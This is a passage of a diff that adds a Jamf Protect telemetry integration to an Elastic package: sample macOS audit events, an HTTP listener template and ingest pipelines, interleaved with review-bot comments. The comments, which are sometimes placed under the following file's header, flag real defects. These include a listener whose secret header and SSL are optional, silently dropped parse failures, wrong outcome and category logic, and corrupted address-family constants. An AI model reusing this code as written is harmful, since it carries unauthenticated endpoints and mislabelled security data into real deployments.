"host_info": { + "host": { + "uuid": "AE2FA359-6AB0-5F54-9E4A-39EDCF015C91" + } + }, + "identity": { + "cd_hash": "beef65d6aeba15d0dd7ef1a076d4bcbd386c1652", + "signer": { + "id_truncated": "false", + "type": "1" + } + }, + "return": { + "description": "success" + }, + 
"subject": { + "effective": { + "group": { + "id": "0", + "name": "wheel" + } + }, + "process": { + "name": "/usr/libexec/mdmclient", + "pid": 70971 + }, + "session": { + "id": "100016" + }, + "terminal_id": { + "port": 0, + "type": "4" + } + } + } + }, + "process": { + "code_signature": { + "signing_id": "com.apple.mdmclient" + }, + "exit_code": 0, + "hash": { + "sha1": "b71712207edc22d9b5753aac0d927a7d9ded719d" + }, + "real_group": { + "id": "0", + "name": "wheel" + }, + "real_user": { + "id": "4294967295" + }, + "user": { + "id": "0", + "name": "root" + } + }, + "related": { + "hash": [ + "b71712207edc22d9b5753aac0d927a7d9ded719d" + ], + "hosts": [ + "Mac mini" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "root" + ] + }, + "user": { + "id": "0", + "name": [ + "root" + ] + } + }, + { + "@timestamp": "2024-02-06T15:54:28.477Z", + "ecs": { + "version": "8.11.0" + }, + "error": { + "code": "0" + }, + "event": { + "action": "aue_ssauthorize", + "category": [ + "authentication" + ], + "code": "45025", + "kind": "event", + "outcome": "success", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Mac mini", + "id": "H2WGF2U9Q6NV", + "ip": [ + "0.0.0.0" + ], + "os": { + "version": "Version 14.2.1 (Build 23C71)" + } + }, + "jamf_protect": { + "telemetry": { + "dataset": "audit", + "header": { + "event_modifier": "0", + "version": "11" + }, + "host_info": { + "host": { + "uuid": "AE2FA359-6AB0-5F54-9E4A-39EDCF015C91" + } + }, + "identity": { + "cd_hash": "fc3dce73c15ec7a1cba507101fec3a47e268fa27", + "signer": { + "id_truncated": "false", + "type": "1" + } + }, + "return": { + "description": "success" + }, + "subject": { + "effective": { + "group": { + "id": "0", + "name": "wheel" + } + }, + "process": { + "name": "/usr/libexec/mdmclient", + "pid": 69544 + }, + "session": { + "id": "100016" + }, + "terminal_id": { + "port": 959597, + "type": "4" + } + }, + "texts": [ + "com.apple.ServiceManagement.daemons.modify", + "client /usr/libexec/mdmclient", + "creator 
/usr/libexec/mdmclient" + ] + } + }, + "process": { + "code_signature": { + "signing_id": "com.apple.authd" + }, + "exit_code": 0, + "hash": { + "sha1": "b71712207edc22d9b5753aac0d927a7d9ded719d" + }, + "real_group": { + "id": "0", + "name": "wheel" + }, + "real_user": { + "id": "4294967295" + }, + "user": { + "id": "0", + "name": "root" + } + }, + "related": { + "hash": [ + "b71712207edc22d9b5753aac0d927a7d9ded719d" + ], + "hosts": [ + "Mac mini" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "root" + ] + }, + "user": { + "id": "0", + "name": [ + "root" + ] + } + }, + { + "@timestamp": "2024-02-06T16:08:56.272Z", + "ecs": { + "version": "8.11.0" + }, + "error": { + "code": "0" + }, + "event": { + "action": "aue_session_end", + "category": [ + "authentication" + ], + "code": "44903", + "kind": "event", + "outcome": "success", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Goomba", + "id": "H2WHM0PAQ6NV", + "ip": [ + "0.0.0.0" + ], + "os": { + "version": "Version 14.2.1 (Build 23C71)" + } + }, + "jamf_protect": { + "telemetry": { + "arguments": { + "am_failure": "0", + "am_success": "0", + "sflags": "0" + }, + "dataset": "audit", + "header": { + "event_modifier": "0", + "version": "11" + }, + "host_info": { + "host": { + "uuid": "667A9510-585B-526B-9B61-47BD834C8ECE" + } + }, + "return": { + "description": "success" + }, + "subject": { + "effective": { + "group": { + "id": "0", + "name": "wheel" + } + }, + "process": { + "pid": 0 + }, + "session": { + "id": "101188" + }, + "terminal_id": { + "port": 0, + "type": "4" + } + } + } + }, + "process": { + "exit_code": 0, + "real_group": { + "id": "0", + "name": "wheel" + }, + "real_user": { + "id": "4294967295" + }, + "user": { + "id": "0", + "name": "root" + } + }, + "related": { + "hosts": [ + "Goomba" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "root" + ] + }, + "user": { + "id": "0", + "name": [ + "root" + ] + } + } + ] +} \ No newline at end of file 
diff --git a/packages/jamf_protect/data_stream/telemetry/agent/stream/http_endpoint.yml.hbs b/packages/jamf_protect/data_stream/telemetry/agent/stream/http_endpoint.yml.hbs
new file mode 100644
index 00000000000..b1f76c36101
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/agent/stream/http_endpoint.yml.hbs
@@ -0,0 +1,35 @@
+listen_address: {{listen_address}}
+listen_port: {{listen_port}}
+url: {{url}}
+{{#if secret_header}}
+secret.header: {{secret_header}}
+{{/if}}
+{{#if secret_value}}
+secret.value: {{secret_value}}
+{{/if}}
+{{#if preserve_original_event}}
+preserve_original_event: true
+{{/if}}
+{{#if preserve_duplicate_custom_fields}}
+preserve_duplicate_custom_fields: true
+{{/if}}
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#if preserve_duplicate_custom_fields}}
+ - preserve_duplicate_custom_fields
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if ssl}}
+ssl: {{ssl}}
+{{/if}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/default.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..12cf8ae9493
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/default.yml
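Review bot: `secret.header` and `secret.value` are emitted only when the corresponding variables are set, so an instance configured without them runs an HTTP listener on `{{listen_address}}:{{listen_port}}` that accepts any POST, and `ssl` is optional in the same way. The package manifest is not in this chunk, so if it does not already require the secret pair or state that an unauthenticated plaintext listener is only acceptable behind a trusted collector, a template comment such as `{{! secret_header/secret_value are optional; without both the endpoint accepts unauthenticated requests }}` would make the trade-off explicit to whoever copies this template into the next data stream.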
@@ -0,0 +1,54 @@
+---
+description: Pipeline for Jamf Protect Telemetry logs.
+processors:
+ - set:
+ field: ecs.version
+ value: '8.11.0'
+ - rename:
+ field: message
+ target_field: event.original
+ ignore_missing: true
+ - json:
+ field: event.original
+ target_field: json
+ ignore_failure: true
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_system_performance_metrics" }}'
+ if: ctx.json?.header?.event_name == 'SYSTEM_PERFORMANCE_METRICS'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_audit" }}'
+ if: ctx.json?.header?.event_name != null && ctx.json?.header?.event_name.startsWith('AUE_')
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_bios_firmware_versions" }}'
+ if: ctx.json?.header?.event_name == 'BIOS_FIRMWARE_VERSIONS'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_event" }}'
+ if: "['FILE_COLLECTION_EVENT','PLAINTEXT_LOG_COLLECTION'].contains(ctx.json?.header?.event_name)"
+ - remove:
+ field: event.original
+ if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))
+ ignore_failure: true
+ - remove:
+ field: json
+ ignore_missing: true
+ - script:
+ description: Drops null/empty values recursively.
+ lang: painless
+ source:
+ boolean dropEmptyFields(Object object) {
+ if (object == null || object == '') {
+ return true;
+ } else if (object instanceof Map) {
+ ((Map) object).values().removeIf(value -> dropEmptyFields(value));
+ return (((Map) object).size() == 0);
+ } else if (object instanceof List) {
+ ((List) object).removeIf(value -> dropEmptyFields(value));
+ return (((List) object).length == 0);
+ }
+ return false;
+ }
+ dropEmptyFields(ctx);
+on_failure:
+ - set:
+ field: error.message
+ value: '{{ _ingest.on_failure_message }}'
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_audit.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_audit.yml
new file mode 100644
index 00000000000..097f35f0c9a
--- /dev/null
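Review bot: The `json` processor uses `ignore_failure: true`, so a message that is not valid JSON is passed on silently: none of the four `pipeline` conditions match, `event.original` is then removed unless the `preserve_original_event` tag is set, and the resulting document carries neither the raw payload nor an `error.message` saying why. Replacing `ignore_failure: true` with an `on_failure` that appends `'{{{_ingest.on_failure_message}}}'` to `error.message` (the pattern the audit pipeline in this same diff already uses for its convert processors) keeps the failure visible to whoever triages the data stream. The same gap exists for a parsed event whose `header.event_name` matches none of the routing conditions: it gets no `event.kind` at all, so a trailing fallback such as `set` of `event.kind: event` guarded on `ctx.event?.kind == null`, or a tag naming the unhandled event, would make those records findable.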
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_audit.yml 
@@ -0,0 +1,357 @@
+---
+description: Pipeline for Jamf Protect Telemetry audit logs.
+processors:
+ - set:
+ field: jamf_protect.telemetry.dataset
+ value: audit
+ - convert:
+ field: json._event_score
+ target_field: jamf_protect.telemetry.event_score
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.header.event_id
+ target_field: event.code
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.header.event_modifier
+ target_field: jamf_protect.telemetry.header.event_modifier
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.header.event_name
+ target_field: event.action
+ ignore_missing: true
+ - lowercase:
+ field: event.action
+ ignore_missing: true
+ - script:
+ lang: painless
+ if: ctx.json?.header?.time_seconds_epoch != 0
+ source: |
+ ctx.json.time_milliseconds = (long)ctx.json?.header?.time_seconds_epoch * 1000 + (long)ctx.json?.header?.time_milliseconds_offset;
+ - date:
+ field: json.time_milliseconds
+ if: ctx.json?.time_milliseconds != 0
+ formats:
+ - UNIX_MS
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.header.version
+ target_field: jamf_protect.telemetry.header.version
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.host_info.host_name
+ target_field: host.hostname
+ ignore_missing: true
+ - append:
+ field: related.hosts
+ value: '{{{host.hostname}}}'
+ if: ctx.host?.hostname != null
+ allow_duplicates: false
+ ignore_failure: true
+ - rename:
+ field: json.host_info.host_uuid
+ target_field: jamf_protect.telemetry.host_info.host.uuid
+ ignore_missing: true
+ - rename:
+ field: json.host_info.osversion
+ target_field: host.os.version
+ ignore_missing: true
+ - append:
+ field: host.mac
+ value: '{{{json.host_info.primary_mac_address}}}'
+ if: ctx.json?.host_info?.primary_mac_address != null
+ allow_duplicates: false
+ ignore_failure: true
+ - gsub:
+ field: host.mac
+ pattern: '[-:.]'
+ replacement: '-'
+ ignore_missing: true
+ - uppercase:
+ field: host.mac
+ ignore_missing: true
+ - rename:
+ field: json.host_info.serial_number
+ target_field: host.id
+ ignore_missing: true
+ - rename:
+ field: json.return.description
+ target_field: jamf_protect.telemetry.return.description
+ ignore_missing: true
+ - convert:
+ field: json.return.error
+ target_field: error.code
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - set:
+ field: event.outcome
+ value: 'success'
+ if: ctx.error?.code == '0'
+ - set:
+ field: event.outcome
+ value: 'failure'
+ if: ctx.error?.code != '0'
+ - convert:
+ field: json.return.return_value
+ target_field: process.exit_code
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.subject.audit_id
+ target_field: process.real_user.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.subject.audit_user_name
+ target_field: process.real_user.name
+ ignore_missing: true
+ - append:
+ field: related.user
+ value: '{{{process.real_user.name}}}'
+ if: ctx.process?.real_user?.name != null
+ allow_duplicates: false
+ ignore_failure: true
+ - append:
+ field: user.name
+ value: '{{{json.subject.audit_user_name}}}'
+ if: ctx.json?.subject?.audit_user_name != null
+ allow_duplicates: false
+ ignore_failure: true
+ - convert:
+ field: json.subject.effective_group_id
+ target_field: jamf_protect.telemetry.subject.effective.group.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.subject.effective_group_name
+ target_field: jamf_protect.telemetry.subject.effective.group.name
+ ignore_missing: true
+ - convert:
+ field: json.subject.effective_user_id
+ target_field: process.user.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - append:
+ field: user.name
+ value: '{{{json.subject.effective_user_name}}}'
+ if: ctx.json?.subject?.effective_user_name != null
+ allow_duplicates: false
+ ignore_failure: true
+ - append:
+ field: related.user
+ value: '{{{json.subject.effective_user_name}}}'
+ if: ctx.json?.subject?.effective_user_name != null
+ allow_duplicates: false
+ ignore_failure: true
+ - rename:
+ field: json.subject.effective_user_name
+ target_field: process.user.name
+ ignore_missing: true
+ - convert:
+ field: json.subject.group_id
+ target_field: process.real_group.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.subject.group_name
+ target_field: process.real_group.name
+ ignore_missing: true
+ - rename:
+ field: json.subject.process_hash
+ target_field: process.hash.sha1
+ ignore_missing: true
+ - append:
+ field: related.hash
+ value: '{{{process.hash.sha1}}}'
+ if: ctx.process?.hash?.sha1 != null
+ allow_duplicates: false
+ ignore_failure: true
+ - convert:
+ field: json.subject.process_id
+ target_field: jamf_protect.telemetry.subject.process.pid
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - rename:
+ field: json.subject.process_name
+ target_field: jamf_protect.telemetry.subject.process.name
+ ignore_missing: true
+ - convert:
+ field: json.subject.session_id
+ target_field: jamf_protect.telemetry.subject.session.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.subject.terminal_id.addr
+ target_field: jamf_protect.telemetry.subject.terminal_id.addr
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.subject.terminal_id.ip_address
+ type: ip
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: json.subject.terminal_id.ip_address
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - append:
+ field: host.ip
+ value: '{{{json.subject.terminal_id.ip_address}}}'
+ if: ctx.json?.subject?.terminal_id?.ip_address != null
+ allow_duplicates: false
+ ignore_failure: true
+ - append:
+ field: related.ip
+ value: '{{{json.subject.terminal_id.ip_address}}}'
+ if: ctx.json?.subject?.terminal_id?.ip_address != null
+ allow_duplicates: false
+ ignore_failure: true
+ - convert:
+ field: json.subject.terminal_id.port
+ target_field: jamf_protect.telemetry.subject.terminal_id.port
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.subject.terminal_id.type
+ target_field: jamf_protect.telemetry.subject.terminal_id.type
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.subject.user_id
+ target_field: user.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - append:
+ field: user.name
+ value: '{{{json.subject.user_name}}}'
+ if: ctx.json?.subject?.user_name != null
+ allow_duplicates: false
+ ignore_failure: true
+ - append:
+ field: related.user
+ value: '{{{json.subject.user_name}}}'
+ if: ctx.json?.subject?.user_name != null
+ allow_duplicates: false
+ ignore_failure: true
+ - append:
+ field: event.type
+ value: info
+ - set:
+ field: event.kind
+ value: event
+ - append:
+ field: event.category
+ value: authentication
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_accept" }}'
+ if: ctx.event?.action == 'aue_accept'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_auth" }}'
+ if: '["aue_auth_user", "aue_ssauthorize", "aue_ssauthmech"].contains(ctx.event?.action)'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_bind_and_aue_connect" }}'
+ if: '["aue_bind", "aue_connect"].contains(ctx.event?.action)'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_chdir" }}'
+ if: ctx.event?.action == 'aue_chdir'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_chroot" }}'
+ if: ctx.event?.action == 'aue_chroot'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_execve" }}'
+ if: ctx.event?.action == 'aue_execve'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_exit" }}'
+ if: ctx.event?.action == 'aue_exit'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_kill" }}'
+ if: ctx.event?.action == 'aue_kill'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_mount" }}'
+ if: ctx.event?.action == 'aue_mount'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_posix_spawn" }}'
+ if: ctx.event?.action == 'aue_posix_spawn'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_remove_from_group_and_aue_mac_set_proc" }}'
+ if: '["aue_remove_from_group", "aue_mac_set_proc"].contains(ctx.event?.action)'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_session" }}'
+ if: '["aue_session_end", "aue_session_update", "aue_session_close", "aue_session_start"].contains(ctx.event?.action)'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_arguments" }}'
+ if: '["aue_setsockopt", "aue_shutdown"].contains(ctx.event?.action)'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_ssauthint" }}'
+ if: ctx.event?.action == 'aue_ssauthint'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_tasknameforpid" }}'
+ if: ctx.event?.action == 'aue_tasknameforpid'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_unmount" }}'
+ if: ctx.event?.action == 'aue_unmount'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_fork" }}'
+ if: ctx.event?.action == 'aue_fork'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
+ if: '["aue_getauid", "aue_lw_login", "aue_settimeofday"].contains(ctx.event?.action)'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_listen" }}'
+ if: ctx.event?.action == 'aue_listen'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_logout" }}'
+ if: ctx.event?.action == 'aue_logout'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_pidfortask" }}'
+ if: ctx.event?.action == 'aue_pidfortask'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_setpriority" }}'
+ if: ctx.event?.action == 'aue_setpriority'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_socketpair" }}'
+ if: ctx.event?.action == 'aue_socketpair'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_aue_taskforpid" }}'
+ if: ctx.event?.action == 'aue_taskforpid'
+on_failure:
+ - set:
+ field: error.message
+ value: '{{ _ingest.on_failure_message }}'
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_accept.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_accept.yml
new file mode 100644
index 00000000000..0ef1034e8bd
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_accept.yml
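Review bot: `event.outcome` is set to `failure` whenever `ctx.error?.code != '0'`, which is also true when `json.return.error` is absent, so every record without a return block is reported as a failed operation; the condition should be `if: ctx.error?.code != null && ctx.error.code != '0'`. The timestamp script near the top of the hunk is guarded only by `ctx.json?.header?.time_seconds_epoch != 0`, which passes for a missing field, and it has no processor-level on_failure, so the `(long)` cast on a null value would presumably abort the whole audit pipeline into the top-level handler; `if: ctx.json?.header?.time_seconds_epoch != null && ctx.json.header.time_seconds_epoch != 0` avoids that. `event.category` is appended as `authentication` for every action, and the expected-output file in this same diff shows `aue_posix_spawn`, `aue_connect` and `aue_session_end` categorised that way; deriving the category per action (process for spawn/execve/fork/exit, network for bind/connect/accept/listen, session for the `aue_session_*` events) is what ECS-based detection rules key on, so this is worth fixing before the categorisation is baked into dashboards. Finally, `terminal_id.ip_address` is appended to `host.ip` and `related.ip` unconditionally, and the samples in this diff carry `0.0.0.0` there, so excluding that placeholder in the `if` keeps `related.ip` usable for correlation.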
@@ -0,0 +1,60 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_accept audit logs.
+processors:
+ - rename:
+ field: json.path
+ target_field: jamf_protect.telemetry.path
+ ignore_missing: true
+ - convert:
+ field: json.socket_unix.family
+ target_field: json.inet_family
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.socket_unix.path
+ target_field: jamf_protect.telemetry.socket.unix.path
+ ignore_missing: true
+ - convert:
+ field: json.arguments.fd
+ target_field: jamf_protect.telemetry.arguments.fd
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - script:
+ description: Dynamically map Socket Address Families.
+ lang: painless
+ if: ctx.json?.inet_family != null
+ source: |
+ Map map = new HashMap();
+ map.put('0', 'AF_UNSPEC');
+ map.put('1', 'AF_LOCAL');
+ map.put('AF_LOCAL', 'AF_UNIX');
+ map.put('2', 'AF_INET');
+ map.put('3', 'AF_ImapPLINK');
+ map.put('4', 'AF_PUP');
+ map.put('5', 'AF_CHAOS');
+ map.put('6', 'AF_NS');
+ map.put('7', 'AF_ISO');
+ map.put('AF_ISO', 'AF_OSI');
+ map.put('8', 'AF_ECmapA');
+ map.put('9', 'AF_DATAKIT');
+ map.put('10', 'AF_CCITT');
+ map.put('11', 'AF_SNA');
+ map.put('12', 'AF_DECnet');
+ map.put('13', 'AF_DLI');
+ map.put('14', 'AF_LAT');
+ map.put('15', 'AF_HYLINK');
+ map.put('16', 'AF_APPLETALK');
+ map.put('17', 'AF_ROUTE');
+ map.put('18', 'AF_LINK');
+ map.put('19', 'pseudo_AF_XTP');
+ map.put('20', 'AF_COIP');
+ map.put('21', 'AF_CNT');
+ map.put('22', 'pseudo_AF_RTIP');
+ map.put('23', 'AF_IPX');
+ map.put('24', 'AF_SIP');
+ map.put('25', 'pseudo_AF_PIP');
+ ctx.jamf_protect.telemetry.socket.unix.family = map.get(ctx.json.inet_family);
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
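Review bot: Two entries in the address-family map are corrupted: `map.put('3', 'AF_ImapPLINK');` and `map.put('8', 'AF_ECmapA');` look like a rename of `M` to `map` that was applied across the string literals as well, and should read `AF_IMPLINK` and `AF_ECMA`; the `'AF_LOCAL'` and `'AF_ISO'` keys can never be looked up because `json.inet_family` is always a numeric string, so those two lines are dead. The identical script appears in pipeline_aue_bind_and_aue_connect.yml in this same diff with the same two typos, so either fix both copies or move the map into one shared sub-pipeline so the table cannot drift again. Separately, the assignment `ctx.jamf_protect.telemetry.socket.unix.family = map.get(ctx.json.inet_family);` dereferences `socket.unix`, which only exists when the preceding rename of `json.socket_unix.path` actually ran; an event carrying `socket_unix.family` without a path would presumably make the script throw and abort into the top-level on_failure, so writing the result to a scratch field such as `json.inet_family_name` and letting a `rename` with `ignore_missing: true` create the target path would be safer.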
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_arguments.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_arguments.yml
new file mode 100644
index 00000000000..82c19b19a57
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_arguments.yml
@@ -0,0 +1,11 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_arguments audit logs.
+processors:
+ - convert:
+ field: json.arguments.fd
+ target_field: jamf_protect.telemetry.arguments.fd
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_auth.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_auth.yml
new file mode 100644
index 00000000000..5b6bbb7d842
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_auth.yml
@@ -0,0 +1,9 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_auth audit logs.
+processors:
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
+ - rename:
+ field: json.texts
+ target_field: jamf_protect.telemetry.texts
+ ignore_missing: true
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_bind_and_aue_connect.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_bind_and_aue_connect.yml
new file mode 100644
index 00000000000..3d3d4c5e2d6
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_bind_and_aue_connect.yml
@@ -0,0 +1,91 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_bind and aue_connect audit logs.
+processors:
+ - convert:
+ field: json.socket_inet.addr
+ target_field: jamf_protect.telemetry.socket.inet.addr
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.arguments.fd
+ target_field: jamf_protect.telemetry.arguments.fd
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.socket_inet.family
+ target_field: json.inet_family
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.socket_inet.id
+ target_field: jamf_protect.telemetry.socket.inet.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.socket_inet.ip_address
+ target_field: server.ip
+ type: ip
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: json.socket_inet.ip_address
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - append:
+ field: related.ip
+ value: '{{{server.ip}}}'
+ if: ctx.server?.ip != null
+ allow_duplicates: false
+ ignore_failure: true
+ - convert:
+ field: json.socket_inet.port
+ target_field: server.port
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - script:
+ description: Dynamically map Socket Address Families.
+ lang: painless
+ if: ctx.json?.inet_family != null
+ source: |
+ Map map = new HashMap();
+ map.put('0', 'AF_UNSPEC');
+ map.put('1', 'AF_LOCAL');
+ map.put('AF_LOCAL', 'AF_UNIX');
+ map.put('2', 'AF_INET');
+ map.put('3', 'AF_ImapPLINK');
+ map.put('4', 'AF_PUP');
+ map.put('5', 'AF_CHAOS');
+ map.put('6', 'AF_NS');
+ map.put('7', 'AF_ISO');
+ map.put('AF_ISO', 'AF_OSI');
+ map.put('8', 'AF_ECmapA');
+ map.put('9', 'AF_DATAKIT');
+ map.put('10', 'AF_CCITT');
+ map.put('11', 'AF_SNA');
+ map.put('12', 'AF_DECnet');
+ map.put('13', 'AF_DLI');
+ map.put('14', 'AF_LAT');
+ map.put('15', 'AF_HYLINK');
+ map.put('16', 'AF_APPLETALK');
+ map.put('17', 'AF_ROUTE');
+ map.put('18', 'AF_LINK');
+ map.put('19', 'pseudo_AF_XTP');
+ map.put('20', 'AF_COIP');
+ map.put('21', 'AF_CNT');
+ map.put('22', 'pseudo_AF_RTIP');
+ map.put('23', 'AF_IPX');
+ map.put('24', 'AF_SIP');
+ map.put('25', 'pseudo_AF_PIP');
+ ctx.jamf_protect.telemetry.socket.inet.family = map.get(ctx.json.inet_family);
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline_identity_object" }}'
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_chdir.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_chdir.yml
new file mode 100644
index 00000000000..e2bc1de2814
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_chdir.yml
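Review bot: `json.socket_inet.ip_address` and `json.socket_inet.port` are mapped to `server.ip`/`server.port` for both events this pipeline serves, yet for aue_bind the address is presumably the local endpoint being bound rather than a remote peer, so `server.*` reads oddly for half of the documents; confirm that is intended, and if not route bind to `source.ip`/`source.port` (or a vendor field) and keep `server.*`/`destination.*` for connect, stating the choice in the `description:`. The address-family script at the end of the hunk shares the corrupted constants and dead name-keyed entries already noted on pipeline_aue_accept.yml. Its assignment `ctx.jamf_protect.telemetry.socket.inet.family = ...` additionally assumes `jamf_protect.telemetry.socket.inet` exists, which the preceding converts create only when `addr` or `id` were present; a guard such as `if: ctx.json?.inet_family != null && ctx.jamf_protect?.telemetry?.socket?.inet != null` avoids a document failure when only `family` is present.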
@@ -0,0 +1,70 @@
+---
+description: Pipeline for Jamf Protect Telemetry aue_chdir audit logs.
+processors:
+ - convert:
+ field: json.attributes.device
+ target_field: jamf_protect.telemetry.attributes.device
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.attributes.file_access_mode
+ target_field: json.file_access_mode
+ ignore_failure: true
+ - convert:
+ field: json.attributes.file_system_id
+ target_field: jamf_protect.telemetry.attributes.file.system.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.attributes.node_id
+ target_field: jamf_protect.telemetry.attributes.node.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.attributes.owner_group_id
+ target_field: user.group.id
+ type: string
+ ignore_missing: true
